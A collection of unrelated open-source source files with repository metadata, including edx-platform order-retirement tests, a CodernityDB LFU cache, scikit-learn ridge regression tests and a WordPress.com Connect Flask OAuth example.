assert self.handler.messages[0] == '["- - -" from -] Hello Kudzu'
def test_log_w_context(self):
kudzify_logger(self.logger, format=self.format)
builder = EnvironBuilder(path='/foo',
environ_base={'REMOTE_ADDR': '127.0.0.1'})
with RequestContext(builder.get_environ()):
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
assert self.handler.messages[0] == \
'["GET HTTP/1.1 /foo" from 127.0.0.1] Hello Kudzu'
| bsd-3-clause |
waheedahmed/edx-platform | lms/djangoapps/shoppingcart/management/tests/test_retire_order.py | 60 | 2852 | """Tests for the retire_order command"""
from tempfile import NamedTemporaryFile
from django.core.management import call_command
from course_modes.models import CourseMode
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from shoppingcart.models import Order, CertificateItem
from student.tests.factories import UserFactory
class TestRetireOrder(ModuleStoreTestCase):
"""Test the retire_order command"""
def setUp(self):
super(TestRetireOrder, self).setUp()
course = CourseFactory.create()
self.course_key = course.id
CourseMode.objects.create(
course_id=self.course_key,
mode_slug=CourseMode.HONOR,
mode_display_name=CourseMode.HONOR
)
# set up test carts
self.cart, __ = self._create_cart()
self.paying, __ = self._create_cart()
self.paying.start_purchase()
self.already_defunct_cart, __ = self._create_cart()
self.already_defunct_cart.retire()
self.purchased, self.purchased_item = self._create_cart()
self.purchased.status = "purchased"
self.purchased.save()
self.purchased_item.status = "purchased"
self.purchased.save()
def test_retire_order(self):
"""Test the retire_order command"""
nonexistent_id = max(order.id for order in Order.objects.all()) + 1
order_ids = [
self.cart.id,
self.paying.id,
self.already_defunct_cart.id,
self.purchased.id,
nonexistent_id
]
self._create_tempfile_and_call_command(order_ids)
self.assertEqual(
Order.objects.get(id=self.cart.id).status, "defunct-cart"
)
self.assertEqual(
Order.objects.get(id=self.paying.id).status, "defunct-paying"
)
self.assertEqual(
Order.objects.get(id=self.already_defunct_cart.id).status,
"defunct-cart"
)
self.assertEqual(
Order.objects.get(id=self.purchased.id).status, "purchased"
)
def _create_tempfile_and_call_command(self, order_ids):
"""
Takes a list of order_ids, writes them to a tempfile, and then runs the
"retire_order" command on the tempfile
"""
with NamedTemporaryFile() as temp:
temp.write("\n".join(str(order_id) for order_id in order_ids))
temp.seek(0)
call_command('retire_order', temp.name)
def _create_cart(self):
"""Creates a cart and adds a CertificateItem to it"""
cart = Order.get_cart_for_user(UserFactory.create())
item = CertificateItem.add_to_order(
cart, self.course_key, 10, 'honor', currency='usd'
)
return cart, item
| agpl-3.0 |
fldc/CouchPotatoServer | libs/CodernityDB/lfu_cache_with_lock.py | 82 | 5486 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011-2013 Codernity (http://codernity.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
from heapq import nsmallest
from operator import itemgetter
from collections import defaultdict
try:
from collections import Counter
except ImportError:
class Counter(dict):
'Mapping where default values are zero'
def __missing__(self, key):
return 0
def twolvl_iterator(dict):
for k, v in dict.iteritems():
for kk, vv in v.iteritems():
yield k, kk, vv
def create_cache1lvl(lock_obj):
def cache1lvl(maxsize=100):
"""
modified version of http://code.activestate.com/recipes/498245/
"""
def decorating_function(user_function):
cache = {}
use_count = Counter()
lock = lock_obj()
@functools.wraps(user_function)
def wrapper(key, *args, **kwargs):
try:
result = cache[key]
except KeyError:
with lock:
if len(cache) == maxsize:
for k, _ in nsmallest(maxsize // 10 or 1,
use_count.iteritems(),
key=itemgetter(1)):
del cache[k], use_count[k]
cache[key] = user_function(key, *args, **kwargs)
result = cache[key]
use_count[key] += 1
else:
with lock:
use_count[key] += 1
return result
def clear():
cache.clear()
use_count.clear()
def delete(key):
try:
del cache[key]
del use_count[key]
return True
except KeyError:
return False
wrapper.clear = clear
wrapper.cache = cache
wrapper.delete = delete
return wrapper
return decorating_function
return cache1lvl
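# A minimal usage sketch (assuming threading.RLock as the lock factory):
# create_cache1lvl returns an LFU-style decorator whose wrapped function is
# cached by its first positional argument; `expensive_lookup` below is a
# hypothetical stand-in for the real computation.
#
# from threading import RLock
# cache1lvl = create_cache1lvl(RLock)
#
# @cache1lvl(maxsize=100)
# def load_record(key):
#     return expensive_lookup(key)
#
# load_record('doc_1')         # computed and stored in the cache
# load_record('doc_1')         # served from the cache, use count incremented
# load_record.delete('doc_1')  # evict a single key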
def create_cache2lvl(lock_obj):
def cache2lvl(maxsize=100):
"""
modified version of http://code.activestate.com/recipes/498245/
"""
def decorating_function(user_function):
cache = {}
use_count = defaultdict(Counter)
lock = lock_obj()
@functools.wraps(user_function)
def wrapper(*args, **kwargs):
try:
result = cache[args[0]][args[1]]
except KeyError:
with lock:
if wrapper.cache_size == maxsize:
to_delete = maxsize / 10 or 1
for k1, k2, v in nsmallest(to_delete,
twolvl_iterator(
use_count),
key=itemgetter(2)):
del cache[k1][k2], use_count[k1][k2]
if not cache[k1]:
del cache[k1]
del use_count[k1]
wrapper.cache_size -= to_delete
result = user_function(*args, **kwargs)
try:
cache[args[0]][args[1]] = result
except KeyError:
cache[args[0]] = {args[1]: result}
use_count[args[0]][args[1]] += 1
wrapper.cache_size += 1
else:
use_count[args[0]][args[1]] += 1
return result
def clear():
cache.clear()
use_count.clear()
def delete(key, *args):
if args:
try:
del cache[key][args[0]]
del use_count[key][args[0]]
if not cache[key]:
del cache[key]
del use_count[key]
wrapper.cache_size -= 1
return True
except KeyError:
return False
else:
try:
wrapper.cache_size -= len(cache[key])
del cache[key]
del use_count[key]
return True
except KeyError:
return False
wrapper.clear = clear
wrapper.cache = cache
wrapper.delete = delete
wrapper.cache_size = 0
return wrapper
return decorating_function
return cache2lvl
| gpl-3.0 |
fabianp/scikit-learn | sklearn/linear_model/tests/test_ridge.py | 130 | 22974 | import numpy as np
import scipy.sparse as sp
from scipy import linalg
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import ignore_warnings
from sklearn import datasets
from sklearn.metrics import mean_squared_error
from sklearn.metrics import make_scorer
from sklearn.metrics import get_scorer
from sklearn.linear_model.base import LinearRegression
from sklearn.linear_model.ridge import ridge_regression
from sklearn.linear_model.ridge import Ridge
from sklearn.linear_model.ridge import _RidgeGCV
from sklearn.linear_model.ridge import RidgeCV
from sklearn.linear_model.ridge import RidgeClassifier
from sklearn.linear_model.ridge import RidgeClassifierCV
from sklearn.linear_model.ridge import _solve_cholesky
from sklearn.linear_model.ridge import _solve_cholesky_kernel
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import KFold
diabetes = datasets.load_diabetes()
X_diabetes, y_diabetes = diabetes.data, diabetes.target
ind = np.arange(X_diabetes.shape[0])
rng = np.random.RandomState(0)
rng.shuffle(ind)
ind = ind[:200]
X_diabetes, y_diabetes = X_diabetes[ind], y_diabetes[ind]
iris = datasets.load_iris()
X_iris = sp.csr_matrix(iris.data)
y_iris = iris.target
DENSE_FILTER = lambda X: X
SPARSE_FILTER = lambda X: sp.csr_matrix(X)
def test_ridge():
# Ridge regression convergence test using score
# TODO: for this test to be robust, we should use a dataset instead
# of np.random.
rng = np.random.RandomState(0)
alpha = 1.0
for solver in ("svd", "sparse_cg", "cholesky", "lsqr"):
# With more samples than features
n_samples, n_features = 6, 5
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
ridge = Ridge(alpha=alpha, solver=solver)
ridge.fit(X, y)
assert_equal(ridge.coef_.shape, (X.shape[1], ))
assert_greater(ridge.score(X, y), 0.47)
if solver == "cholesky":
# Currently the only solver to support sample_weight.
ridge.fit(X, y, sample_weight=np.ones(n_samples))
assert_greater(ridge.score(X, y), 0.47)
# With more features than samples
n_samples, n_features = 5, 10
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
ridge = Ridge(alpha=alpha, solver=solver)
ridge.fit(X, y)
assert_greater(ridge.score(X, y), .9)
if solver == "cholesky":
# Currently the only solver to support sample_weight.
ridge.fit(X, y, sample_weight=np.ones(n_samples))
assert_greater(ridge.score(X, y), 0.9)
def test_primal_dual_relationship():
y = y_diabetes.reshape(-1, 1)
coef = _solve_cholesky(X_diabetes, y, alpha=[1e-2])
K = np.dot(X_diabetes, X_diabetes.T)
dual_coef = _solve_cholesky_kernel(K, y, alpha=[1e-2])
coef2 = np.dot(X_diabetes.T, dual_coef).T
assert_array_almost_equal(coef, coef2)
def test_ridge_singular():
# test on a singular matrix
rng = np.random.RandomState(0)
n_samples, n_features = 6, 6
y = rng.randn(n_samples // 2)
y = np.concatenate((y, y))
X = rng.randn(n_samples // 2, n_features)
X = np.concatenate((X, X), axis=0)
ridge = Ridge(alpha=0)
ridge.fit(X, y)
assert_greater(ridge.score(X, y), 0.9)
def test_ridge_sample_weights():
rng = np.random.RandomState(0)
for solver in ("cholesky", ):
for n_samples, n_features in ((6, 5), (5, 10)):
for alpha in (1.0, 1e-2):
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
sample_weight = 1 + rng.rand(n_samples)
coefs = ridge_regression(X, y,
alpha=alpha,
sample_weight=sample_weight,
solver=solver)
# Sample weight can be implemented via a simple rescaling
# for the square loss.
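                # In formula form: the weighted ridge objective
                #     sum_i s_i * (y_i - x_i . w)**2 + alpha * ||w||**2
                # equals the plain ridge objective on the rescaled data
                #     sum_i (sqrt(s_i) * y_i - (sqrt(s_i) * x_i) . w)**2 + alpha * ||w||**2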
coefs2 = ridge_regression(
X * np.sqrt(sample_weight)[:, np.newaxis],
y * np.sqrt(sample_weight),
alpha=alpha, solver=solver)
assert_array_almost_equal(coefs, coefs2)
# Test for fit_intercept = True
est = Ridge(alpha=alpha, solver=solver)
est.fit(X, y, sample_weight=sample_weight)
# Check using Newton's Method
# Quadratic function should be solved in a single step.
# Initialize
sample_weight = np.sqrt(sample_weight)
X_weighted = sample_weight[:, np.newaxis] * (
np.column_stack((np.ones(n_samples), X)))
y_weighted = y * sample_weight
# Gradient is (X*coef-y)*X + alpha*coef_[1:]
# Remove coef since it is initialized to zero.
grad = -np.dot(y_weighted, X_weighted)
# Hessian is (X.T*X) + alpha*I except that the first
# diagonal element should be zero, since there is no
# penalization of intercept.
diag = alpha * np.ones(n_features + 1)
diag[0] = 0.
hess = np.dot(X_weighted.T, X_weighted)
hess.flat[::n_features + 2] += diag
coef_ = - np.dot(linalg.inv(hess), grad)
assert_almost_equal(coef_[0], est.intercept_)
assert_array_almost_equal(coef_[1:], est.coef_)
def test_ridge_shapes():
# Test shape of coef_ and intercept_
rng = np.random.RandomState(0)
n_samples, n_features = 5, 10
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
Y1 = y[:, np.newaxis]
Y = np.c_[y, 1 + y]
ridge = Ridge()
ridge.fit(X, y)
assert_equal(ridge.coef_.shape, (n_features,))
assert_equal(ridge.intercept_.shape, ())
ridge.fit(X, Y1)
assert_equal(ridge.coef_.shape, (1, n_features))
assert_equal(ridge.intercept_.shape, (1, ))
ridge.fit(X, Y)
assert_equal(ridge.coef_.shape, (2, n_features))
assert_equal(ridge.intercept_.shape, (2, ))
def test_ridge_intercept():
# Test intercept with multiple targets GH issue #708
rng = np.random.RandomState(0)
n_samples, n_features = 5, 10
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
Y = np.c_[y, 1. + y]
ridge = Ridge()
ridge.fit(X, y)
intercept = ridge.intercept_
ridge.fit(X, Y)
assert_almost_equal(ridge.intercept_[0], intercept)
assert_almost_equal(ridge.intercept_[1], intercept + 1.)
def test_toy_ridge_object():
# Test BayesianRegression ridge classifier
# TODO: test also n_samples > n_features
X = np.array([[1], [2]])
Y = np.array([1, 2])
clf = Ridge(alpha=0.0)
clf.fit(X, Y)
X_test = [[1], [2], [3], [4]]
assert_almost_equal(clf.predict(X_test), [1., 2, 3, 4])
assert_equal(len(clf.coef_.shape), 1)
assert_equal(type(clf.intercept_), np.float64)
Y = np.vstack((Y, Y)).T
clf.fit(X, Y)
X_test = [[1], [2], [3], [4]]
assert_equal(len(clf.coef_.shape), 2)
assert_equal(type(clf.intercept_), np.ndarray)
def test_ridge_vs_lstsq():
# On alpha=0., Ridge and OLS yield the same solution.
rng = np.random.RandomState(0)
# we need more samples than features
n_samples, n_features = 5, 4
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
ridge = Ridge(alpha=0., fit_intercept=False)
ols = LinearRegression(fit_intercept=False)
ridge.fit(X, y)
ols.fit(X, y)
assert_almost_equal(ridge.coef_, ols.coef_)
ridge.fit(X, y)
ols.fit(X, y)
assert_almost_equal(ridge.coef_, ols.coef_)
def test_ridge_individual_penalties():
# Tests the ridge object using individual penalties
rng = np.random.RandomState(42)
n_samples, n_features, n_targets = 20, 10, 5
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples, n_targets)
penalties = np.arange(n_targets)
coef_cholesky = np.array([
Ridge(alpha=alpha, solver="cholesky").fit(X, target).coef_
for alpha, target in zip(penalties, y.T)])
coefs_indiv_pen = [
Ridge(alpha=penalties, solver=solver, tol=1e-6).fit(X, y).coef_
for solver in ['svd', 'sparse_cg', 'lsqr', 'cholesky']]
for coef_indiv_pen in coefs_indiv_pen:
assert_array_almost_equal(coef_cholesky, coef_indiv_pen)
# Test error is raised when number of targets and penalties do not match.
ridge = Ridge(alpha=penalties[:3])
assert_raises(ValueError, ridge.fit, X, y)
def _test_ridge_loo(filter_):
    # test that this works with both dense and sparse matrices
n_samples = X_diabetes.shape[0]
ret = []
ridge_gcv = _RidgeGCV(fit_intercept=False)
ridge = Ridge(alpha=1.0, fit_intercept=False)
# generalized cross-validation (efficient leave-one-out)
decomp = ridge_gcv._pre_compute(X_diabetes, y_diabetes)
errors, c = ridge_gcv._errors(1.0, y_diabetes, *decomp)
values, c = ridge_gcv._values(1.0, y_diabetes, *decomp)
# brute-force leave-one-out: remove one example at a time
errors2 = []
values2 = []
for i in range(n_samples):
sel = np.arange(n_samples) != i
X_new = X_diabetes[sel]
y_new = y_diabetes[sel]
ridge.fit(X_new, y_new)
value = ridge.predict([X_diabetes[i]])[0]
error = (y_diabetes[i] - value) ** 2
errors2.append(error)
values2.append(value)
# check that efficient and brute-force LOO give same results
assert_almost_equal(errors, errors2)
assert_almost_equal(values, values2)
# generalized cross-validation (efficient leave-one-out,
# SVD variation)
decomp = ridge_gcv._pre_compute_svd(X_diabetes, y_diabetes)
errors3, c = ridge_gcv._errors_svd(ridge.alpha, y_diabetes, *decomp)
values3, c = ridge_gcv._values_svd(ridge.alpha, y_diabetes, *decomp)
# check that efficient and SVD efficient LOO give same results
assert_almost_equal(errors, errors3)
assert_almost_equal(values, values3)
# check best alpha
ridge_gcv.fit(filter_(X_diabetes), y_diabetes)
alpha_ = ridge_gcv.alpha_
ret.append(alpha_)
# check that we get same best alpha with custom loss_func
f = ignore_warnings
scoring = make_scorer(mean_squared_error, greater_is_better=False)
ridge_gcv2 = RidgeCV(fit_intercept=False, scoring=scoring)
f(ridge_gcv2.fit)(filter_(X_diabetes), y_diabetes)
assert_equal(ridge_gcv2.alpha_, alpha_)
# check that we get same best alpha with custom score_func
func = lambda x, y: -mean_squared_error(x, y)
scoring = make_scorer(func)
ridge_gcv3 = RidgeCV(fit_intercept=False, scoring=scoring)
f(ridge_gcv3.fit)(filter_(X_diabetes), y_diabetes)
assert_equal(ridge_gcv3.alpha_, alpha_)
# check that we get same best alpha with a scorer
scorer = get_scorer('mean_squared_error')
ridge_gcv4 = RidgeCV(fit_intercept=False, scoring=scorer)
ridge_gcv4.fit(filter_(X_diabetes), y_diabetes)
assert_equal(ridge_gcv4.alpha_, alpha_)
# check that we get same best alpha with sample weights
ridge_gcv.fit(filter_(X_diabetes), y_diabetes,
sample_weight=np.ones(n_samples))
assert_equal(ridge_gcv.alpha_, alpha_)
# simulate several responses
Y = np.vstack((y_diabetes, y_diabetes)).T
ridge_gcv.fit(filter_(X_diabetes), Y)
Y_pred = ridge_gcv.predict(filter_(X_diabetes))
ridge_gcv.fit(filter_(X_diabetes), y_diabetes)
y_pred = ridge_gcv.predict(filter_(X_diabetes))
assert_array_almost_equal(np.vstack((y_pred, y_pred)).T,
Y_pred, decimal=5)
return ret
def _test_ridge_cv(filter_):
n_samples = X_diabetes.shape[0]
ridge_cv = RidgeCV()
ridge_cv.fit(filter_(X_diabetes), y_diabetes)
ridge_cv.predict(filter_(X_diabetes))
assert_equal(len(ridge_cv.coef_.shape), 1)
assert_equal(type(ridge_cv.intercept_), np.float64)
cv = KFold(n_samples, 5)
ridge_cv.set_params(cv=cv)
ridge_cv.fit(filter_(X_diabetes), y_diabetes)
ridge_cv.predict(filter_(X_diabetes))
assert_equal(len(ridge_cv.coef_.shape), 1)
assert_equal(type(ridge_cv.intercept_), np.float64)
def _test_ridge_diabetes(filter_):
ridge = Ridge(fit_intercept=False)
ridge.fit(filter_(X_diabetes), y_diabetes)
return np.round(ridge.score(filter_(X_diabetes), y_diabetes), 5)
def _test_multi_ridge_diabetes(filter_):
# simulate several responses
Y = np.vstack((y_diabetes, y_diabetes)).T
n_features = X_diabetes.shape[1]
ridge = Ridge(fit_intercept=False)
ridge.fit(filter_(X_diabetes), Y)
assert_equal(ridge.coef_.shape, (2, n_features))
Y_pred = ridge.predict(filter_(X_diabetes))
ridge.fit(filter_(X_diabetes), y_diabetes)
y_pred = ridge.predict(filter_(X_diabetes))
assert_array_almost_equal(np.vstack((y_pred, y_pred)).T,
Y_pred, decimal=3)
def _test_ridge_classifiers(filter_):
n_classes = np.unique(y_iris).shape[0]
n_features = X_iris.shape[1]
for clf in (RidgeClassifier(), RidgeClassifierCV()):
clf.fit(filter_(X_iris), y_iris)
assert_equal(clf.coef_.shape, (n_classes, n_features))
y_pred = clf.predict(filter_(X_iris))
assert_greater(np.mean(y_iris == y_pred), .79)
n_samples = X_iris.shape[0]
cv = KFold(n_samples, 5)
clf = RidgeClassifierCV(cv=cv)
clf.fit(filter_(X_iris), y_iris)
y_pred = clf.predict(filter_(X_iris))
assert_true(np.mean(y_iris == y_pred) >= 0.8)
def _test_tolerance(filter_):
ridge = Ridge(tol=1e-5)
ridge.fit(filter_(X_diabetes), y_diabetes)
score = ridge.score(filter_(X_diabetes), y_diabetes)
ridge2 = Ridge(tol=1e-3)
ridge2.fit(filter_(X_diabetes), y_diabetes)
score2 = ridge2.score(filter_(X_diabetes), y_diabetes)
assert_true(score >= score2)
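# test_dense_sparse() runs each helper above twice, once with dense input and
# once with sparse input, and requires any returned values (e.g. the best
# alpha from _test_ridge_loo) to agree between the two runs.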
def test_dense_sparse():
for test_func in (_test_ridge_loo,
_test_ridge_cv,
_test_ridge_diabetes,
_test_multi_ridge_diabetes,
_test_ridge_classifiers,
_test_tolerance):
# test dense matrix
ret_dense = test_func(DENSE_FILTER)
# test sparse matrix
ret_sparse = test_func(SPARSE_FILTER)
# test that the outputs are the same
if ret_dense is not None and ret_sparse is not None:
assert_array_almost_equal(ret_dense, ret_sparse, decimal=3)
def test_ridge_cv_sparse_svd():
X = sp.csr_matrix(X_diabetes)
ridge = RidgeCV(gcv_mode="svd")
    assert_raises(TypeError, ridge.fit, X, y_diabetes)
def test_ridge_sparse_svd():
X = sp.csc_matrix(rng.rand(100, 10))
y = rng.rand(100)
ridge = Ridge(solver='svd')
assert_raises(TypeError, ridge.fit, X, y)
def test_class_weights():
# Test class weights.
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0],
[1.0, 1.0], [1.0, 0.0]])
y = [1, 1, 1, -1, -1]
clf = RidgeClassifier(class_weight=None)
clf.fit(X, y)
assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([1]))
    # we give a small weight to class 1
clf = RidgeClassifier(class_weight={1: 0.001})
clf.fit(X, y)
# now the hyperplane should rotate clock-wise and
# the prediction on this point should shift
assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([-1]))
# check if class_weight = 'balanced' can handle negative labels.
clf = RidgeClassifier(class_weight='balanced')
clf.fit(X, y)
assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([1]))
# class_weight = 'balanced', and class_weight = None should return
# same values when y has equal number of all labels
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0], [1.0, 1.0]])
y = [1, 1, -1, -1]
clf = RidgeClassifier(class_weight=None)
clf.fit(X, y)
clfa = RidgeClassifier(class_weight='balanced')
clfa.fit(X, y)
assert_equal(len(clfa.classes_), 2)
assert_array_almost_equal(clf.coef_, clfa.coef_)
assert_array_almost_equal(clf.intercept_, clfa.intercept_)
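# In the ridge classifiers class_weight is applied by rescaling the per-sample
# weights, so class weights and user-supplied sample weights combine
# multiplicatively; the next test checks that equivalence on the iris data.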
def test_class_weight_vs_sample_weight():
"""Check class_weights resemble sample_weights behavior."""
for clf in (RidgeClassifier, RidgeClassifierCV):
# Iris is balanced, so no effect expected for using 'balanced' weights
clf1 = clf()
clf1.fit(iris.data, iris.target)
clf2 = clf(class_weight='balanced')
clf2.fit(iris.data, iris.target)
assert_almost_equal(clf1.coef_, clf2.coef_)
# Inflate importance of class 1, check against user-defined weights
sample_weight = np.ones(iris.target.shape)
sample_weight[iris.target == 1] *= 100
class_weight = {0: 1., 1: 100., 2: 1.}
clf1 = clf()
clf1.fit(iris.data, iris.target, sample_weight)
clf2 = clf(class_weight=class_weight)
clf2.fit(iris.data, iris.target)
assert_almost_equal(clf1.coef_, clf2.coef_)
# Check that sample_weight and class_weight are multiplicative
clf1 = clf()
clf1.fit(iris.data, iris.target, sample_weight ** 2)
clf2 = clf(class_weight=class_weight)
clf2.fit(iris.data, iris.target, sample_weight)
assert_almost_equal(clf1.coef_, clf2.coef_)
def test_class_weights_cv():
# Test class weights for cross validated ridge classifier.
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0],
[1.0, 1.0], [1.0, 0.0]])
y = [1, 1, 1, -1, -1]
clf = RidgeClassifierCV(class_weight=None, alphas=[.01, .1, 1])
clf.fit(X, y)
    # we give a small weight to class 1
clf = RidgeClassifierCV(class_weight={1: 0.001}, alphas=[.01, .1, 1, 10])
clf.fit(X, y)
assert_array_equal(clf.predict([[-.2, 2]]), np.array([-1]))
def test_ridgecv_store_cv_values():
# Test _RidgeCV's store_cv_values attribute.
    rng = np.random.RandomState(42)
n_samples = 8
n_features = 5
x = rng.randn(n_samples, n_features)
alphas = [1e-1, 1e0, 1e1]
n_alphas = len(alphas)
r = RidgeCV(alphas=alphas, store_cv_values=True)
# with len(y.shape) == 1
y = rng.randn(n_samples)
r.fit(x, y)
assert_equal(r.cv_values_.shape, (n_samples, n_alphas))
# with len(y.shape) == 2
n_responses = 3
y = rng.randn(n_samples, n_responses)
r.fit(x, y)
assert_equal(r.cv_values_.shape, (n_samples, n_responses, n_alphas))
def test_ridgecv_sample_weight():
rng = np.random.RandomState(0)
alphas = (0.1, 1.0, 10.0)
# There are different algorithms for n_samples > n_features
# and the opposite, so test them both.
for n_samples, n_features in ((6, 5), (5, 10)):
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
sample_weight = 1 + rng.rand(n_samples)
cv = KFold(n_samples, 5)
ridgecv = RidgeCV(alphas=alphas, cv=cv)
ridgecv.fit(X, y, sample_weight=sample_weight)
# Check using GridSearchCV directly
parameters = {'alpha': alphas}
fit_params = {'sample_weight': sample_weight}
gs = GridSearchCV(Ridge(), parameters, fit_params=fit_params,
cv=cv)
gs.fit(X, y)
assert_equal(ridgecv.alpha_, gs.best_estimator_.alpha)
assert_array_almost_equal(ridgecv.coef_, gs.best_estimator_.coef_)
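# With an explicit ``cv`` object, RidgeCV performs a plain grid search over
# ``alphas`` rather than the efficient generalized cross-validation path,
# which is why the loop above can reproduce its choice with GridSearchCV.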
def test_raises_value_error_if_sample_weights_greater_than_1d():
# Sample weights must be either scalar or 1D
n_sampless = [2, 3]
n_featuress = [3, 2]
rng = np.random.RandomState(42)
for n_samples, n_features in zip(n_sampless, n_featuress):
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
sample_weights_OK = rng.randn(n_samples) ** 2 + 1
sample_weights_OK_1 = 1.
sample_weights_OK_2 = 2.
sample_weights_not_OK = sample_weights_OK[:, np.newaxis]
sample_weights_not_OK_2 = sample_weights_OK[np.newaxis, :]
ridge = Ridge(alpha=1)
# make sure the "OK" sample weights actually work
ridge.fit(X, y, sample_weights_OK)
ridge.fit(X, y, sample_weights_OK_1)
ridge.fit(X, y, sample_weights_OK_2)
def fit_ridge_not_ok():
ridge.fit(X, y, sample_weights_not_OK)
def fit_ridge_not_ok_2():
ridge.fit(X, y, sample_weights_not_OK_2)
assert_raise_message(ValueError,
"Sample weights must be 1D array or scalar",
fit_ridge_not_ok)
assert_raise_message(ValueError,
"Sample weights must be 1D array or scalar",
fit_ridge_not_ok_2)
def test_sparse_design_with_sample_weights():
# Sample weights must work with sparse matrices
n_sampless = [2, 3]
n_featuress = [3, 2]
rng = np.random.RandomState(42)
sparse_matrix_converters = [sp.coo_matrix,
sp.csr_matrix,
sp.csc_matrix,
sp.lil_matrix,
sp.dok_matrix
]
sparse_ridge = Ridge(alpha=1., fit_intercept=False)
dense_ridge = Ridge(alpha=1., fit_intercept=False)
for n_samples, n_features in zip(n_sampless, n_featuress):
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
sample_weights = rng.randn(n_samples) ** 2 + 1
for sparse_converter in sparse_matrix_converters:
X_sparse = sparse_converter(X)
sparse_ridge.fit(X_sparse, y, sample_weight=sample_weights)
dense_ridge.fit(X, y, sample_weight=sample_weights)
assert_array_almost_equal(sparse_ridge.coef_, dense_ridge.coef_,
decimal=6)
def test_raises_value_error_if_solver_not_supported():
# Tests whether a ValueError is raised if a non-identified solver
# is passed to ridge_regression
wrong_solver = "This is not a solver (MagritteSolveCV QuantumBitcoin)"
exception = ValueError
message = "Solver %s not understood" % wrong_solver
def func():
X = np.eye(3)
y = np.ones(3)
ridge_regression(X, y, alpha=1., solver=wrong_solver)
assert_raise_message(exception, message, func)
def test_sparse_cg_max_iter():
reg = Ridge(solver="sparse_cg", max_iter=1)
reg.fit(X_diabetes, y_diabetes)
assert_equal(reg.coef_.shape[0], X_diabetes.shape[1])
| bsd-3-clause |
Automattic/wpcom-connect-examples | flask/run.py | 1 | 2318 | # Example WordPress.com Connect
from flask import Flask
app = Flask(__name__)
from flask import request
from flask import make_response
from flask import abort, redirect, url_for
import urllib
import md5
import random
import string
import requests
wpcc_consts = {
"client_id": 1234, #TODO
"client_secret": "Your WP.com secret", #TODO
"login_url": "http://localhost:5000/", #TODO
"redirect_url": "http://localhost:5000/connected", #TODO
"request_token_url": "https://public-api.wordpress.com/oauth2/token",
"authenticate_url": "https://public-api.wordpress.com/oauth2/authenticate"
}
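# OAuth2 authorization-code flow, in two steps:
#  1. login() sends the browser to authenticate_url with a random ``state``
#     value that is also stored in a cookie (CSRF protection).
#  2. connected() checks that the ``state`` echoed back by WordPress.com
#     matches the cookie, then POSTs the one-time ``code`` to
#     request_token_url to exchange it for an access token.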
@app.route("/")
def login():
state = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(30))
params = {
"response_type": "code",
"client_id": wpcc_consts['client_id'],
"state": state,
"redirect_uri": wpcc_consts['redirect_url']
}
wpcc_url = wpcc_consts['authenticate_url'] + '?' + urllib.urlencode(params)
resp = make_response(
'<html><body><h2>Connect to Trafalgar Square</h2><p>' + state + '</p><a href="' +
wpcc_url +
'"><img src="//s0.wp.com/i/wpcc-button.png" width="231" /></a></body></html>'
)
resp.set_cookie('wpcc_state', state)
return resp
@app.route("/connected")
def connected():
code = request.args.get( 'code' )
if not code:
return redirect(url_for('login'))
state = request.args.get( 'state' )
if not state:
return 'Warning! State variable missing after authentication'
wpcc_state = request.cookies.get( 'wpcc_state' )
if state != wpcc_state:
return 'Warning! State mismatch. Authentication attempt may have been compromised. ' + wpcc_state
payload = {
"client_id" : wpcc_consts['client_id'],
"redirect_uri" : wpcc_consts['redirect_url'],
"client_secret" : wpcc_consts['client_secret'],
"code" : code, #The code from the previous request
"grant_type" : 'authorization_code'
}
r = requests.post(wpcc_consts['request_token_url'], data=payload)
if 200 == r.status_code:
#TODO: in real app, store the returned token
return 'Connected to Trafalgar Square!'
return 'Error: ' + r.text
if __name__ == "__main__":
app.debug = True
app.run()
| unlicense |
jackkiej/SickRage | lib/pgi/cffilib/gir/gifunctioninfo.py | 19 | 2047 | # Copyright 2013 Christoph Reiter
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
from .. import _create_enum_class, glib
from .._utils import string_decode
from ._ffi import ffi, lib
from .gibaseinfo import GIBaseInfo, GIInfoType
from .gicallableinfo import GICallableInfo
from .gipropertyinfo import GIPropertyInfo
GIFunctionInfoFlags = _create_enum_class(ffi, "GIFunctionInfoFlags",
"GI_FUNCTION_", flags=True)
GInvokeError = _create_enum_class(ffi, "GInvokeError", "G_INVOKE_ERROR_")
@GIBaseInfo._register(GIInfoType.FUNCTION)
class GIFunctionInfo(GICallableInfo):
@property
def symbol(self):
res = lib.g_function_info_get_symbol(self._ptr)
return string_decode(ffi, res)
@property
def flags(self):
return GIFunctionInfoFlags(lib.g_function_info_get_flags(self._ptr))
